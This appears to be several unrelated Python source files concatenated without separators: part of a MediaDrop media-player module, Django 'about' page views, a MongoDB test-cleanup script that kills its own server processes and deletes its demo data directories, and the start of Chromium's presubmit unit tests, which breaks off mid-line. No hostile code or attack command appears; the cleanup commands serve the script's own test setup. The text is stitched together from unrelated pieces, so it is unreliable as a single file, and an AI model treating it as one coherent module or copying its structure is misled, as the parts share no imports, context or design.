FlowPlayer(AbstractFlashPlayer): """ FlowPlayer (Flash) """ name = u'flowplayer' """A unicode string identifier for this class.""" display_name = N_(u'Flowplayer') """A unicode display name for the class, to be used in the settings UI.""" supported_schemes = set([HTTP]) def swf_url(self): """Return the flash player URL.""" return url_for('/scripts/third-party/flowplayer/flowplayer-3.2.14.swf', qualified=self.qualified) def flashvars(self): """Return a python dict of flashvars for this player.""" http_uri = self.uris[0] playlist = [] vars = { 'canvas': {'backgroundColor': '#000', 'backgroundGradient': 'none'}, 'plugins': { 'controls': {'autoHide': True}, }, 'clip': {'scaling': 'fit'}, 'playlist': playlist, } # Show a preview image if self.media.type == AUDIO or not self.autoplay: playlist.append({ 'url': thumb_url(self.media, 'l', qualified=self.qualified), 'autoPlay': True, 'autoBuffer': True, }) playlist.append({ 'url': str(http_uri), 'autoPlay': self.autoplay, 'autoBuffer': self.autoplay or self.autobuffer, }) # Flowplayer wants these options passed as an escaped JSON string # inside a single 'config' flashvar. 
When using the flowplayer's # own JS, this is automatically done, but since we use Swiff, a # SWFObject clone, we have to do this ourselves. vars = {'config': simplejson.dumps(vars, separators=(',', ':'))} return vars AbstractFlashPlayer.register(FlowPlayer) ############################################################################### class AbstractEmbedPlayer(AbstractPlayer): """ Abstract Embed Player for third-party services like YouTube Typically embed players will play only their own content, and that is the only way such content can be played. Therefore each embed type has been given its own :attr:`~mediadrop.lib.uri.StorageURI.scheme` which uniquely identifies it. For example, :meth:`mediadrop.lib.storage.YoutubeStorage.get_uris` returns URIs with a scheme of `'youtube'`, and the special :class:`YoutubePlayer` would overload :attr:`scheme` to also be `'youtube'`. This would allow the Youtube player to play only those URIs. """ scheme = abstractproperty() """The `StorageURI.scheme` which uniquely identifies this embed type.""" @classmethod def can_play(cls, uris): """Test all the given URIs to see if they can be played by this player. This is a class method, not an instance or static method. :type uris: list :param uris: A collection of StorageURI tuples to test. :rtype: tuple :returns: Boolean result for each of the given URIs. """ return tuple(uri.scheme == cls.scheme for uri in uris) class AbstractIframeEmbedPlayer(AbstractEmbedPlayer): """ Abstract Embed Player for services that provide an iframe player. """ def render_js_player(self): """Render a javascript string to instantiate a javascript player. Each player has a client-side component to provide a consistent way of initializing and interacting with the player. For more information see ``mediadrop/public/scripts/mcore/players/``. :rtype: ``unicode`` :returns: A javascript string which will evaluate to an instance of a JS player class. For example: ``new mcore.Html5Player()``. """ return Markup("new mcore.IframePlayer()") class AbstractFlashEmbedPlayer(FlashRenderMixin, AbstractEmbedPlayer): """ Simple Abstract Flash Embed Player Provides sane defaults for most flash-based embed players from third-party vendors, which typically never need any flashvars or special configuration. """ def swf_url(self): """Return the flash player URL.""" return str(self.uris[0]) def flashvars(self): """Return a python dict of flashvars for this player.""" return {} class VimeoUniversalEmbedPlayer(AbstractIframeEmbedPlayer): """ Vimeo Universal Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.VimeoStorage`. This player has seamless HTML5 and Flash support. """ name = u'vimeo' """A unicode string identifier for this class.""" display_name = N_(u'Vimeo') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'vimeo' """The `StorageURI.scheme` which uniquely identifies this embed type.""" def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. 
""" uri = self.uris[0] tag = Element('iframe', src=uri, frameborder=0, width=self.adjusted_width, height=self.adjusted_height) return tag AbstractIframeEmbedPlayer.register(VimeoUniversalEmbedPlayer) class DailyMotionEmbedPlayer(AbstractIframeEmbedPlayer): """ Daily Motion Universal Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.DailyMotionStorage`. This player has seamless HTML5 and Flash support. """ name = u'dailymotion' """A unicode string identifier for this class.""" display_name = N_(u'Daily Motion') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'dailymotion' """The `StorageURI.scheme` which uniquely identifies this embed type.""" def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ uri = self.uris[0] data = urlencode({ 'width': 560, # XXX: The native height for this width is 420 'theme': 'none', 'iframe': 1, 'autoPlay': 0, 'hideInfos': 1, 'additionalInfos': 1, 'foreground': '#F7FFFD', 'highlight': '#FFC300', 'background': '#171D1B', }) tag = Element('iframe', src='%s?%s' % (uri, data), frameborder=0, width=self.adjusted_width, height=self.adjusted_height) if error_text: tag(error_text) return tag AbstractIframeEmbedPlayer.register(DailyMotionEmbedPlayer) class YoutubePlayer(AbstractIframeEmbedPlayer): """ YouTube Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.YoutubeStorage`. """ name = u'youtube' """A unicode string identifier for this class.""" display_name = N_(u'YouTube') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'youtube' """The `StorageURI.scheme` which uniquely identifies this embed type.""" settings_form_class = player_forms.YoutubePlayerPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = { 'version': 3, 'disablekb': 0, 'autohide': 2, 'autoplay': 0, 'iv_load_policy': 1, 'modestbranding': 1, 'fs': 1, 'hd': 0, 'showinfo': 0, 'rel': 0, 'showsearch': 0, 'wmode': 0, } _height_diff = 25 def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. 
""" uri = self.uris[0] data = self.data.copy() wmode = data.pop('wmode', 0) if wmode: # 'wmode' is subject to a lot of myths and half-true statements, # these are the best resources I could find: # http://stackoverflow.com/questions/886864/differences-between-using-wmode-transparent-opaque-or-window-for-an-embed # http://kb2.adobe.com/cps/127/tn_12701.html#main_Using_Window_Mode__wmode__values_ data['wmode'] = 'opaque' data_qs = urlencode(data) iframe_attrs = dict( frameborder=0, width=self.adjusted_width, height=self.adjusted_height, ) if bool(data.get('fs')): iframe_attrs.update(dict( allowfullscreen='', # non-standard attributes, required to enable YouTube's HTML5 # full-screen capabilities mozallowfullscreen='', webkitallowfullscreen='', )) tag = Element('iframe', src='%s?%s' % (uri, data_qs), **iframe_attrs) if error_text: tag(error_text) return tag AbstractIframeEmbedPlayer.register(YoutubePlayer) class GoogleVideoFlashPlayer(AbstractFlashEmbedPlayer): """ Google Video Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.GoogleVideoStorage`. """ name = u'googlevideo' """A unicode string identifier for this class.""" display_name = N_(u'Google Video') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'googlevideo' """The `StorageURI.scheme` which uniquely identifies this embed type.""" _height_diff = 27 AbstractFlashEmbedPlayer.register(GoogleVideoFlashPlayer) class BlipTVFlashPlayer(AbstractFlashEmbedPlayer): """ BlipTV Player This simple player handles media with files that stored using :class:`mediadrop.lib.storage.BlipTVStorage`. """ name = u'bliptv' """A unicode string identifier for this class.""" display_name = N_(u'BlipTV') """A unicode display name for the class, to be used in the settings UI.""" scheme = u'bliptv' """The `StorageURI.scheme` which uniquely identifies this embed type.""" AbstractFlashEmbedPlayer.register(BlipTVFlashPlayer) ############################################################################### class AbstractHTML5Player(FileSupportMixin, AbstractPlayer): """ HTML5 <audio> / <video> tag. References: - http://dev.w3.org/html5/spec/Overview.html#audio - http://dev.w3.org/html5/spec/Overview.html#video - http://developer.apple.com/safari/library/documentation/AudioVideo/Conceptual/Using_HTML5_Audio_Video/Introduction/Introduction.html """ supported_containers = set(['mp3', 'mp4', 'ogg', 'webm', 'm3u8']) supported_schemes = set([HTTP]) def __init__(self, *args, **kwargs): super(AbstractHTML5Player, self).__init__(*args, **kwargs) # Move mp4 files to the front of the list because the iPad has # a bug that prevents it from playing but the first file. self.uris.sort(key=lambda uri: uri.file.container != 'mp4') self.uris.sort(key=lambda uri: uri.file.container != 'm3u8') def html5_attrs(self): attrs = { 'id': self.elem_id, 'controls': 'controls', 'width': self.adjusted_width, 'height': self.adjusted_height, } if self.autoplay: attrs['autoplay'] = 'autoplay' elif self.autobuffer: # This isn't included in the HTML5 spec, but Safari supports it attrs['autobuffer'] = 'autobuffer' if self.media.type == VIDEO: attrs['poster'] = thumb_url(self.media, 'l', qualified=self.qualified) return attrs def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. 
:rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ attrs = self.html5_attrs() tag = Element(self.media.type, **attrs) for uri in self.uris: # Providing a type attr breaks for m3u8 breaks iPhone playback. # Tried: application/x-mpegURL, vnd.apple.mpegURL, video/MP2T if uri.file.container == 'm3u8': mimetype = None else: mimetype = uri.file.mimetype tag(Element('source', src=uri, type=mimetype)) if error_text: tag(error_text) return tag def render_js_player(self): return Markup("new mcore.Html5Player()") class HTML5Player(AbstractHTML5Player): """ HTML5 Player Implementation. Seperated from :class:`AbstractHTML5Player` to make it easier to subclass and provide a custom HTML5 player. """ name = u'html5' """A unicode string identifier for this class.""" display_name = N_(u'Plain HTML5 Player') """A unicode display name for the class, to be used in the settings UI.""" AbstractHTML5Player.register(HTML5Player) ############################################################################### class HTML5PlusFlowPlayer(AbstractHTML5Player): """ HTML5 Player with fallback to FlowPlayer. """ name = u'html5+flowplayer' """A unicode string identifier for this class.""" display_name = N_(u'HTML5 + Flowplayer Fallback') """A unicode display name for the class, to be used in the settings UI.""" settings_form_class = player_forms.HTML5OrFlashPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {'prefer_flash': False} """An optional default data dictionary for user preferences.""" supported_containers = HTML5Player.supported_containers \ | FlowPlayer.supported_containers supported_schemes = HTML5Player.supported_schemes \ | FlowPlayer.supported_schemes def __init__(self, media, uris, **kwargs): super(HTML5PlusFlowPlayer, self).__init__(media, uris, **kwargs) self.flowplayer = None self.prefer_flash = self.data.get('prefer_flash', False) self.uris = [u for u, p in izip(uris, AbstractHTML5Player.can_play(uris)) if p] flow_uris = [u for u, p in izip(uris, FlowPlayer.can_play(uris)) if p] if flow_uris: self.flowplayer = FlowPlayer(media, flow_uris, **kwargs) def render_js_player(self): flash = self.flowplayer and self.flowplayer.render_js_player() html5 = self.uris and super(HTML5PlusFlowPlayer, self).render_js_player() if html5 and flash: return Markup("new mcore.MultiPlayer([%s, %s])" % \ (self.prefer_flash and (flash, html5) or (html5, flash))) if html5 or flash: return html5 or flash return None def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. 
""" if self.uris: return super(HTML5PlusFlowPlayer, self).render_markup(error_text) return error_text or u'' AbstractHTML5Player.register(HTML5PlusFlowPlayer) ############################################################################### class JWPlayer(AbstractHTML5Player): """ JWPlayer (Flash) """ name = u'jwplayer' """A unicode string identifier for this class.""" display_name = N_(u'JWPlayer') """A unicode display name for the class, to be used in the settings UI.""" supported_containers = AbstractHTML5Player.supported_containers \ | AbstractRTMPFlashPlayer.supported_containers \ | set(['xml', 'srt']) # supported_containers.add('youtube') supported_types = set([AUDIO, VIDEO, AUDIO_DESC, CAPTIONS]) supported_schemes = set([HTTP, RTMP]) # Height adjustment in pixels to accomodate the control bar and stay 16:9 _height_diff = 24 providers = { AUDIO: 'sound', VIDEO: 'video', } def __init__(self, media, uris, **kwargs): html5_uris = [uri for uri, p in izip(uris, AbstractHTML5Player.can_play(uris)) if p] flash_uris = [uri for uri, p in izip(uris, AbstractRTMPFlashPlayer.can_play(uris)) if p] super(JWPlayer, self).__init__(media, html5_uris, **kwargs) self.all_uris = uris self.flash_uris = flash_uris self.rtmp_uris = pick_uris(flash_uris, scheme=RTMP) def swf_url(self): return url_for('/scripts/third-party/jw_player/player.swf', qualified=self.qualified) def js_url(self): return url_for('/scripts/third-party/jw_player/jwplayer.min.js', qualified=self.qualified) def player_vars(self): """Return a python dict of vars for this player.""" vars = { 'autostart': self.autoplay, 'height': self.adjusted_height, 'width': self.adjusted_width, 'controlbar': 'bottom', 'players': [ # XXX: Currently flash *must* come first for the RTMP/HTTP logic. {'type': 'flash', 'src': self.swf_url()}, {'type': 'html5'}, {'type': 'download'}, ], } playlist = self.playlist() plugins = self.plugins() if playlist: vars['playlist'] = playlist if plugins: vars['plugins'] = plugins # Playlists have 'image's and <video> elements have provide 'poster's, # but <audio> elements have no 'poster' attribute. Set an image via JS: if self.media.type == AUDIO and not playlist: vars['image'] = thumb_url(self.media, 'l', qualified=self.qualified) return vars def playlist(self): if self.uris: return None if self.rtmp_uris: return self.rtmp_playlist() uri = self.flash_uris[0] return [{ 'image': thumb_url(self.media, 'l', qualified=self.qualified), 'file': str(uri), 'duration': self.media.duration, 'provider': self.providers[uri.file.type], }] def rtmp_playlist(self): levels = [] item = {'streamer': self.rtmp_uris[0].server_uri, 'provider': 'rtmp', 'levels': levels, 'duration': self.media.duration} # If no HTML5 uris exist, no <video> tag will be output, so we have to # say which thumb image to use. Otherwise it's unnecessary bytes. if not self.uris: item['image'] = thumb_url(self.media, 'l', qualified=self.qualified) for uri in self.rtmp_uris: levels.append({ 'file': uri.file_uri, 'bitrate': uri.file.bitrate, 'width': uri.file.width, }) playlist = [item] return playlist def plugins(self): plugins = {} audio_desc = pick_uris(self.all_uris, type=AUDIO_DESC) captions = pick_uris(self.all_uris, type=CAPTIONS) if audio_desc: plugins['audiodescription'] = {'file': str(audio_desc[0])} if captions: plugins['captions'] = {'file': str(captions[0])} return plugins def flash_override_playlist(self): # Use this hook only when HTML5 and RTMP uris exist. 
if self.uris and self.rtmp_uris: return self.rtmp_playlist() def render_js_player(self): vars = simplejson.dumps(self.player_vars()) flash_playlist = simplejson.dumps(self.flash_override_playlist()) return Markup("new mcore.JWPlayer(%s, %s)" % (vars, flash_playlist)) def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ if self.uris: html5_tag = super(JWPlayer, self).render_markup(error_text) else: html5_tag = '' script_tag = Markup( '<script type="text/javascript" src="%s"></script>' % self.js_url()) return html5_tag + script_tag AbstractHTML5Player.register(JWPlayer) ############################################################################### class SublimePlayer(AbstractHTML5Player): """ Sublime Video Player with a builtin flash fallback """ name = u'sublime' """A unicode string identifier for this class.""" display_name = N_(u'Sublime Video Player') """A unicode display name for the class, to be used in the settings UI.""" settings_form_class = player_forms.SublimePlayerPrefsForm """An optional :class:`mediadrop.forms.admin.players.PlayerPrefsForm`.""" default_data = {'script_tag': ''} """An optional default data dictionary for user preferences.""" supported_types = set([VIDEO]) """Sublime does not support AUDIO at this time.""" supports_resizing = False """A flag that allows us to mark the few players that can't be resized. Setting this to False ensures that the resize (expand/shrink) controls will not be shown in our player control bar. """ def html5_attrs(self): attrs = super(SublimePlayer, self).html5_attrs() attrs['class'] = (attrs.get('class', '') + ' sublime').strip() return attrs def render_js_player(self): return Markup('new mcore.SublimePlayer()') def render_markup(self, error_text=None): """Render the XHTML markup for this player instance. :param error_text: Optional error text that should be included in the final markup if appropriate for the player. :rtype: ``unicode`` or :class:`genshi.core.Markup` :returns: XHTML that will not be escaped by Genshi. """ video_tag = super(SublimePlayer, self).render_markup(error_text) return video_tag + Markup(self.data['script_tag']) AbstractHTML5Player.register(SublimePlayer) ############################################################################### class iTunesPlayer(FileSupportMixin, AbstractPlayer): """ A dummy iTunes Player that allows us to test if files :meth:`can_play`. 
""" name = u'itunes' """A unicode string identifier for this class.""" display_name = N_(u'iTunes Player') """A unicode display name for the class, to be used in the settings UI.""" supported_containers = set(['mp3', 'mp4']) supported_schemes = set([HTTP]) ############################################################################### def preferred_player_for_media(media, **kwargs): uris = media.get_uris() from mediadrop.model.players import fetch_enabled_players # Find the first player that can play any uris for player_cls, player_data in fetch_enabled_players(): can_play = player_cls.can_play(uris) if any(can_play): break else: return None # Grab just the uris that the chosen player can play playable_uris = [uri for uri, plays in izip(uris, can_play) if plays] kwargs['data'] = player_data return player_cls(media, playable_uris, **kwargs) def media_player(media, is_widescreen=False, show_like=True, show_dislike=True, show_download=False, show_embed=False, show_playerbar=True, show_popout=True, show_resize=False, show_share=True, js_init=None, **kwargs): """Instantiate and render the preferred player that can play this media. We make no effort to pick the "best" player here, we simply return the first player that *can* play any of the URIs associated with the given media object. It's up to the user to declare their own preferences wisely. Player preferences are fetched from the database and the :attr:`mediadrop.model.players.c.data` dict is passed as kwargs to :meth:`AbstractPlayer.__init__`. :type media: :class:`mediadrop.model.media.Media` :param media: A media instance to play. :param js_init: Optional function to call after the javascript player controller has been instantiated. Example of a function literal: ``function(controller){ controller.setFillScreen(true); }``. Any function reference can be used as long as it is defined in all pages and accepts the JS player controller as its first and only argument. :param \*\*kwargs: Extra kwargs for :meth:`AbstractPlayer.__init__`. :rtype: `str` or `None` :returns: A rendered player. """ player = preferred_player_for_media(media, **kwargs) return render('players/html5_or_flash.html', { 'player': player, 'media': media, 'uris': media.get_uris(), 'is_widescreen': is_widescreen, 'js_init': js_init, 'show_like': show_like, 'show_dislike': show_dislike, 'show_download': show_download, 'show_embed': show_embed, 'show_playerbar': show_playerbar, 'show_popout': show_popout, 'show_resize': show_resize and (player and player.supports_resizing), 'show_share': show_share, }) def pick_podcast_media_file(media): """Return a file playable in the most podcasting client: iTunes. :param media: A :class:`~mediadrop.model.media.Media` instance. :returns: A :class:`~mediadrop.model.media.MediaFile` object or None """ uris = media.get_uris() for i, plays in enumerate(iTunesPlayer.can_play(uris)): if plays: return uris[i] return None def pick_any_media_file(media): """Return a file playable in at least one of the configured players. :param media: A :class:`~mediadrop.model.media.Media` instance. :returns: A :class:`~mediadrop.model.media.MediaFile` object or None """ uris = media.get_uris() from mediadrop.model.players import fetch_enabled_players for player_cls, player_data in fetch_enabled_players(): for i, plays in enumerate(player_cls.can_play(uris)): if plays: return uris[i] return None def update_enabled_players(): """Ensure that the encoding status of all media is up to date with the new set of enabled players. 
The encoding status of Media objects is dependent on there being an enabled player that supports that format. Call this method after changing the set of enabled players, to ensure encoding statuses are up to date. """ from mediadrop.model import DBSession, Media media = DBSession.query(Media) for m in media: m.update_status() def embed_iframe(media, width=400, height=225, frameborder=0, **kwargs): """Return an <iframe> tag that loads our universal player. :type media: :class:`mediadrop.model.media.Media` :param media: The media object that is being rendered, to be passed to all instantiated player objects. :rtype: :class:`genshi.builder.Element` :returns: An iframe element stream. """ src = url_for(controller='/media', action='embed_player', slug=media.slug, qualified=True) tag = Element('iframe', src=src, width=width, height=height, frameborder=frameborder, **kwargs) # some software is known not to work with self-closing iframe tags # ('<iframe ... />'). Several WordPress instances are affected as well as # TWiki http://mediadrop.net/community/topic/embed-iframe-closing-tag tag.append('') return tag embed_player = embed_iframe
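# --- Usage sketch (illustrative, not part of the module above) ---------------
# A minimal sketch of how the rendering helpers defined above might be called
# from controller code, assuming `media` is a mediadrop.model.media.Media
# instance fetched elsewhere; the function name `render_watch_page` is
# hypothetical and only serves to group the calls.
def render_watch_page(media):
    # Render the first enabled player that can play any of the media's URIs;
    # extra kwargs are forwarded to AbstractPlayer.__init__.
    player_html = media_player(media, is_widescreen=True, autoplay=False)
    # Build the <iframe> tag that loads the universal embed player.
    iframe = embed_iframe(media, width=560, height=315)
    # Prefer a podcast-friendly (iTunes-playable) file, falling back to any
    # file that at least one enabled player can handle.
    podcast_uri = pick_podcast_media_file(media) or pick_any_media_file(media)
    return player_html, iframe, podcast_uri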
from datetime import datetime

from django.shortcuts import render

from api.models import Launch
from app.models import Translator, Staff


def _previous_launches(limit=5):
    """Return the most recent launches that have already occurred, newest first."""
    return Launch.objects.filter(net__lte=datetime.now()).order_by('-net')[:limit]


def translator_view(request):
    translators = Translator.objects.all()
    return render(request, 'web/about/translators.html',
                  {'translators': translators,
                   'previous_launches': _previous_launches()})


def staff_view(request):
    staff = Staff.objects.all()
    return render(request, 'web/about/staff.html',
                  {'staff': staff,
                   'previous_launches': _previous_launches()})


def about_view(request):
    return render(request, 'web/about/about.html',
                  {'previous_launches': _previous_launches()})
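# --- URLconf sketch (illustrative) --------------------------------------------
# A minimal sketch of how these views might be wired up, assuming a Django 2.0+
# style urls.py in the same app; the URL paths and names below are assumptions,
# not taken from the project (an older project would use django.conf.urls.url
# with regex patterns instead).
from django.urls import path

from . import views  # hypothetical import location for the views above

urlpatterns = [
    path('about/', views.about_view, name='about'),
    path('about/translators/', views.translator_view, name='translators'),
    path('about/staff/', views.staff_view, name='staff'),
]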
import subprocess
import os
import time
import inspect
from os import path

try:
    from pymongo import MongoClient as Connection
except ImportError:
    # Older pymongo releases expose the client class as Connection.
    from pymongo import Connection

""" Global path variables """

PORTS_ONE = {"PRIMARY": "27117", "SECONDARY": "27118", "ARBITER": "27119",
             "CONFIG": "27220", "MONGOS": "27217"}
PORTS_TWO = {"PRIMARY": "27317", "SECONDARY": "27318", "ARBITER": "27319",
             "CONFIG": "27220", "MONGOS": "27217"}
CURRENT_DIR = inspect.getfile(inspect.currentframe())
CMD_DIR = os.path.realpath(os.path.abspath(os.path.split(CURRENT_DIR)[0]))
SETUP_DIR = path.expanduser(CMD_DIR)
DEMO_SERVER_DATA = SETUP_DIR + "/data"
DEMO_SERVER_LOG = SETUP_DIR + "/logs"
MONGOD_KSTR = " --dbpath " + DEMO_SERVER_DATA
MONGOS_KSTR = "mongos --port " + PORTS_ONE["MONGOS"]


def kill_mongo_proc(host, port):
    """Shut down the mongod on the given host/port, force-killing it if the
    clean shutdown command fails."""
    try:
        conn = Connection(host, int(port))
        conn['admin'].command('shutdown', 1, force=True)
    except Exception:
        cmd = ["pgrep -f \"" + str(port) + MONGOD_KSTR + "\" | xargs kill -9"]
        execute_command(cmd)


def kill_mongos_proc():
    """Kill all mongos processes."""
    cmd = ["pgrep -f \"" + MONGOS_KSTR + "\" | xargs kill -9"]
    execute_command(cmd)


def kill_all_mongo_proc(host, ports):
    """Kill any existing mongods listening on the given ports."""
    for port in ports.values():
        kill_mongo_proc(host, port)


def remove_dir(dir_path):
    """Remove the supplied directory tree."""
    command = ["rm", "-rf", dir_path]
    subprocess.Popen(command).communicate()


def execute_command(command):
    """Wait a little and then execute the shell command."""
    time.sleep(1)
    subprocess.Popen(command, shell=True)


if __name__ == "__main__":
    remove_dir(DEMO_SERVER_LOG)
    remove_dir(DEMO_SERVER_DATA)

    # Kill all spawned mongods
    kill_all_mongo_proc('localhost', PORTS_ONE)
    kill_all_mongo_proc('localhost', PORTS_TWO)

    # Kill all spawned mongos
    kill_mongos_proc()
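# --- Teardown sketch (illustrative, not part of the script above) -------------
# A minimal sketch of reusing the cleanup helpers above from another test
# harness. The module name `mongo_cleanup` is an assumption for illustration;
# adjust it to wherever the script above actually lives.
from mongo_cleanup import (kill_all_mongo_proc, kill_mongos_proc, remove_dir,
                           PORTS_ONE, DEMO_SERVER_DATA, DEMO_SERVER_LOG)


def teardown_first_replica_set():
    """Stop the first replica set, its mongos, and wipe its data/log dirs."""
    kill_all_mongo_proc('localhost', PORTS_ONE)  # shut down each mongod member
    kill_mongos_proc()                           # then the mongos router
    remove_dir(DEMO_SERVER_DATA)                 # finally remove on-disk state
    remove_dir(DEMO_SERVER_LOG)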
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Unit tests for presubmit_support.py and presubmit_canned_checks.py.""" # pylint: disable=E1101,E1103 import StringIO import functools import itertools import logging import multiprocessing import os import sys import time import unittest _ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) sys.path.insert(0, _ROOT) from testing_support.super_mox import mox, SuperMoxTestBase import owners import subprocess2 as subprocess import presubmit_support as presubmit import rietveld # Shortcut. presubmit_canned_checks = presubmit.presubmit_canned_checks # Access to a protected member XXX of a client class # pylint: disable=W0212 class PresubmitTestsBase(SuperMoxTestBase): """Setups and tear downs the mocks but doesn't test anything as-is.""" presubmit_text = """ def CheckChangeOnUpload(input_api, output_api): if not input_api.change.NOSUCHKEY: return [output_api.PresubmitError("!!")] elif not input_api.change.REALLYNOSUCHKEY: return [output_api.PresubmitPromptWarning("??")] elif not input_api.change.REALLYABSOLUTELYNOSUCHKEY: return [output_api.PresubmitPromptWarning("??"), output_api.PresubmitError("XX!!XX")] else: return () """ presubmit_tryslave = """ def GetPreferredTrySlaves(): return %s """ presubmit_tryslave_project = """ def GetPreferredTrySlaves(project): if project == %s: return %s else: return %s """ presubmit_trymaster = """ def GetPreferredTryMasters(project, change): return %s """ presubmit_diffs = """ --- file1 2011-02-09 10:38:16.517224845 -0800 +++ file2 2011-02-09 10:38:53.177226516 -0800 @@ -1,6 +1,5 @@ this is line number 0 this is line number 1 -this is line number 2 to be deleted this is line number 3 this is line number 4 this is line number 5 @@ -8,7 +7,7 @@ this is line number 7 this is line number 8 this is line number 9 -this is line number 10 to be modified +this is line number 10 this is line number 11 this is line number 12 this is line number 13 @@ -21,9 +20,8 @@ this is line number 20 this is line number 21 this is line number 22 -this is line number 23 -this is line number 24 -this is line number 25 +this is line number 23.1 +this is line number 25.1 this is line number 26 this is line number 27 this is line number 28 @@ -31,6 +29,7 @@ this is line number 30 this is line number 31 this is line number 32 +this is line number 32.1 this is line number 33 this is line number 34 this is line number 35 @@ -38,14 +37,14 @@ this is line number 37 this is line number 38 this is line number 39 - this is line number 40 -this is line number 41 +this is line number 41.1 this is line number 42 this is line number 43 this is line number 44 this is line number 45 + this is line number 46 this is line number 47 -this is line number 48 +this is line number 48.1 this is line number 49 """ def setUp(self): SuperMoxTestBase.setUp(self) class FakeChange(object): def __init__(self, obj): self._root = obj.fake_root_dir def RepositoryRoot(self): return self._root self.mox.StubOutWithMock(presubmit, 'random') self.mox.StubOutWithMock(presubmit, 'warn') presubmit._ASKED_FOR_FEEDBACK = False self.fake_root_dir = self.RootDir() self.fake_change = FakeChange(self) # Special mocks. def MockAbsPath(f): return f def MockChdir(f): return None # SuperMoxTestBase already mock these but simplify our life. 
presubmit.os.path.abspath = MockAbsPath presubmit.os.getcwd = self.RootDir presubmit.os.chdir = MockChdir self.mox.StubOutWithMock(presubmit.scm, 'determine_scm') self.mox.StubOutWithMock(presubmit.scm.SVN, '_CaptureInfo') self.mox.StubOutWithMock(presubmit.scm.SVN, 'GetFileProperty') self.mox.StubOutWithMock(presubmit.gclient_utils, 'FileRead') self.mox.StubOutWithMock(presubmit.gclient_utils, 'FileWrite') self.mox.StubOutWithMock(presubmit.scm.SVN, 'GenerateDiff') self.mox.StubOutWithMock(presubmit.scm.GIT, 'GenerateDiff') # On some platforms this does all sorts of undesirable system calls, so # just permanently mock it with a lambda that returns 2 multiprocessing.cpu_count = lambda: 2 class PresubmitUnittest(PresubmitTestsBase): """General presubmit_support.py tests (excluding InputApi and OutputApi).""" _INHERIT_SETTINGS = 'inherit-review-settings-ok' def testMembersChanged(self): self.mox.ReplayAll() members = [ 'AffectedFile', 'Change', 'DoGetTrySlaves', 'DoPostUploadExecuter', 'DoPresubmitChecks', 'GetPostUploadExecuter', 'GetTrySlavesExecuter', 'GitAffectedFile', 'CallCommand', 'CommandData', 'GitChange', 'InputApi', 'ListRelevantPresubmitFiles', 'main', 'NonexistantCannedCheckFilter', 'OutputApi', 'ParseFiles', 'PresubmitFailure', 'PresubmitExecuter', 'PresubmitOutput', 'ScanSubDirs', 'SvnAffectedFile', 'SvnChange', 'auth', 'cPickle', 'cpplint', 'cStringIO', 'contextlib', 'canned_check_filter', 'fix_encoding', 'fnmatch', 'gclient_utils', 'glob', 'inspect', 'json', 'load_files', 'logging', 'marshal', 'normpath', 'optparse', 'os', 'owners', 'pickle', 'presubmit_canned_checks', 'random', 're', 'rietveld', 'scm', 'subprocess', 'sys', 'tempfile', 'time', 'traceback', 'types', 'unittest', 'urllib2', 'warn', 'multiprocessing', 'DoGetTryMasters', 'GetTryMastersExecuter', 'itertools', ] # If this test fails, you should add the relevant test. 
self.compareMembers(presubmit, members) def testCannedCheckFilter(self): canned = presubmit.presubmit_canned_checks orig = canned.CheckOwners with presubmit.canned_check_filter(['CheckOwners']): self.assertNotEqual(canned.CheckOwners, orig) self.assertEqual(canned.CheckOwners(None, None), []) self.assertEqual(canned.CheckOwners, orig) def testCannedCheckFilterFail(self): canned = presubmit.presubmit_canned_checks orig = canned.CheckOwners def failAttempt(): with presubmit.canned_check_filter(['CheckOwners', 'Spazfleem']): pass self.assertRaises(presubmit.NonexistantCannedCheckFilter, failAttempt) self.assertEqual(canned.CheckOwners, orig) def testListRelevantPresubmitFiles(self): join = presubmit.os.path.join files = [ 'blat.cc', join('foo', 'haspresubmit', 'yodle', 'smart.h'), join('moo', 'mat', 'gat', 'yo.h'), join('foo', 'luck.h'), ] inherit_path = presubmit.os.path.join(self.fake_root_dir, self._INHERIT_SETTINGS) presubmit.os.path.isfile(inherit_path).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'haspresubmit', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'foo', 'haspresubmit', 'yodle', 'PRESUBMIT.py')).AndReturn(True) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'PRESUBMIT.py')).AndReturn(False) presubmit.os.path.isfile(join(self.fake_root_dir, 'moo', 'mat', 